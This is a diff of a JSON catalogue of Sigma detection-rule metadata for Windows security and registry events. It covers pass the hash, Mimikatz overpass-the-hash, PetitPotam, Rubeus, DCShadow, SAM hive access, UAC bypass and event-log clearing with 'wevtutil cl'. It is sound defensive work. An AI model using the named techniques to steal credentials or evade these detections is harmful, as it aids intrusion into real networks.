"6fb63b40-e02a-403e-9ffd-3bcc1d749442", - "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1548.002" ] }, - "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset" }, { "description": "Detects NetNTLM downgrade attack", @@ -16308,13 +11345,13 @@ "falsepositive": [ "Unknown" ], - "filename": "win_security_net_ntlm_downgrade.yml", + "filename": "registry_event_net_ntlm_downgrade.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense_evasion", @@ -16322,2303 +11359,385 @@ "attack.t1112" ] }, - "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "value": "NetNTLM Downgrade Attack" + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "value": "NetNTLM Downgrade Attack - Registry" }, { - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { - "author": "Tim Shelton (HAWK.IO)", - "creation_date": "2021/12/06", - "falsepositive": [ - "Read only access list authority" - ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "value": "Windows Network Access Suspicious desktop.ini Action" - }, - { - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" - }, - { - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "meta": { - "author": "Pushkarev Dmitry", - "creation_date": "2020/06/27", - "falsepositive": [ - "Valid user was not added to RDP group" - ], - "filename": "win_security_not_allowed_rdp_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "value": "Denied Access To Remote Desktop" - }, - { - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "meta": { - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", - "creation_date": "2018/02/12", - "falsepositive": [ - "Runas command-line tool using /netonly parameter" - ], - "filename": "win_security_overpass_the_hash.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" - ] - }, - "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "value": "Successful Overpass the Hash Attempt" - }, - { - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "meta": { - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", - "creation_date": "2019/06/14", - "falsepositive": [ - "Administrator activity" - ], - "filename": "win_security_pass_the_hash_2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", - "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ] - }, - "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "value": "Pass the Hash Activity 2" - }, - { - "description": "Detect PetitPotam coerced authentication activity.", - "meta": { - "author": "Mauricio Velazco, Michael Haag", - "creation_date": "2021/09/02", - "falsepositive": [ - "Unknown. Feedback welcomed." - ], - "filename": "win_security_petitpotam_network_share.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ] - }, - "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "value": "Possible PetitPotam Coerce Authentication Attempt" - }, - { - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "meta": { - "author": "Mauricio Velazco, Michael Haag", - "creation_date": "2021/09/02", - "falsepositive": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." - ], - "filename": "win_security_petitpotam_susp_tgt_request.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ] - }, - "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", - "value": "PetitPotam Suspicious Kerberos TGT Request" - }, - { - "description": "Detects DCShadow via create new SPN", - "meta": { - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2019/10/25", - "falsepositive": [ - "Valid on domain controllers; exclude known DCs" - ], - "filename": "win_security_possible_dc_shadow.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1207" - ] - }, - "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", - "value": "Possible DC Shadow Attack" - }, - { - "description": "Detects powershell script installed as a Service", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_powershell_script_installed_as_service.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", - "value": "PowerShell Scripts Installed as Services - Security" - }, - { - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_protected_storage_service_access.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", - "value": "Protected Storage Service Access" - }, - { - "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/23", - "falsepositive": [ - "Software installation", - "Software updates" - ], - "filename": "win_security_rare_schtasks_creations.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "car.2013-08-001", - "attack.t1053.005" - ] - }, - "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", - "value": "Rare Schtasks Creations" - }, - { - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "meta": { - "author": "Florian Roth (rule), Adam Bradbury (idea)", - "creation_date": "2019/06/02", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", "falsepositive": [ "Unlikely" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ] - }, - "uuid": "8400629e-79a9-4737-b387-5db940ab2367", - "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" - }, - { - "description": "RDP login with localhost source address may be a tunnelled login", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_rdp_localhost_login.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" - ], - "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" - ] - }, - "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", - "value": "RDP Login from Localhost" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/16", - "falsepositive": [ - "Programs that connect locally to the RDP port" - ], - "filename": "win_security_rdp_reverse_tunnel.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", - "value": "RDP over Reverse SSH Tunnel WFP" - }, - { - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "meta": { - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ] - }, - "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "value": "Register new Logon Process by Rubeus" - }, - { - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", - "falsepositive": [ - "Legitimate use of remote PowerShell execution" - ], - "filename": "win_security_remote_powershell_session.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "value": "Remote PowerShell Sessions Network Connections (WinRM)" - }, - { - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_replay_attack_detected.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" - ], - "tags": "No established tags" - }, - "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", - "value": "Replay Attack Detected" - }, - { - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/22", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" - ], - "tags": "No established tags" - }, - "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "value": "Suspicious Computer Account Name Change CVE-2021-42287" - }, - { - "description": "Detects handles requested to SAM registry hive", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_sam_registry_hive_handle_request.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "value": "SAM Registry Hive Handle Request" - }, - { - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "meta": { - "author": "David Strassegger, Tim Shelton", - "creation_date": "2021/01/22", - "falsepositive": [ - "Software installation" - ], - "filename": "win_security_scheduled_task_deletion.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/matthewdunwoody/status/1352356685982146562", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" - ] - }, - "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", - "value": "Scheduled Task Deletion" - }, - { - "description": "Detects non-system users failing to get a handle of the SCM database.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_scm_database_handle_failure.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1010" - ] - }, - "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "value": "SCM Database Handle Failure" - }, - { - "description": "Detects non-system users performing privileged operation os the SCM database", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_scm_database_privileged_operation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", - "value": "SCM Database Privileged Operation" - }, - { - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/09/02", - "falsepositive": [ - "SCCM" - ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", - "value": "Remote WMI ActiveScriptEventConsumers" - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_service_installation_by_unusal_client.yml", - "level": "high", - "logsource.category": "security", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://twitter.com/SBousseaden/status/1490608838701166596", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "value": "Service Installed By Unusual Client - Security" - }, - { - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "meta": { - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "creation_date": "2020/08/06", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_smb_file_creation_admin_shares.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", - "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", - "value": "SMB Create Remote File Admin Share" - }, - { - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/03", - "falsepositive": [ - "Legitimate extension of domain structure" - ], - "filename": "win_security_susp_add_domain_trust.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", - "value": "Addition of Domain Trusts" - }, - { - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "meta": { - "author": "Thomas Patzke, @atc_project (improvements)", - "creation_date": "2017/02/19", - "falsepositive": [ - "Migration of an account into a new domain" - ], - "filename": "win_security_susp_add_sid_history.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=1772", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1134.005" - ] - }, - "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "value": "Addition of SID History to Active Directory Object" - }, - { - "description": "Code integrity failures may indicate tampered executables.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/03", - "falsepositive": [ - "Disk device errors" - ], - "filename": "win_security_susp_codeintegrity_check_failure.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "value": "Failed Code Integrity Checks" - }, - { - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "meta": { - "author": "elhoim", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_computer_name.yml", + "filename": "registry_event_stickykey_like_backdoor.yml", "level": "critical", - "logsource.category": "security", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" - ], - "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", - "value": "Win Susp Computer Name Containing Samtheadmin" - }, - { - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Initial installation of a domain controller" - ], - "filename": "win_security_susp_dsrm_password_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=1714", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "value": "Password Change on Directory Service Restore Mode (DSRM) Account" - }, - { - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "filename": "win_security_susp_eventlog_cleared.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "value": "Security Eventlog Cleared" - }, - { - "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_explicit_credentials.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", - "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials" - }, - { - "description": "Detects failed logins with multiple accounts from a single process on the system.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_process.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", - "value": "Multiple Users Failing to Authenticate from Single Process" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - 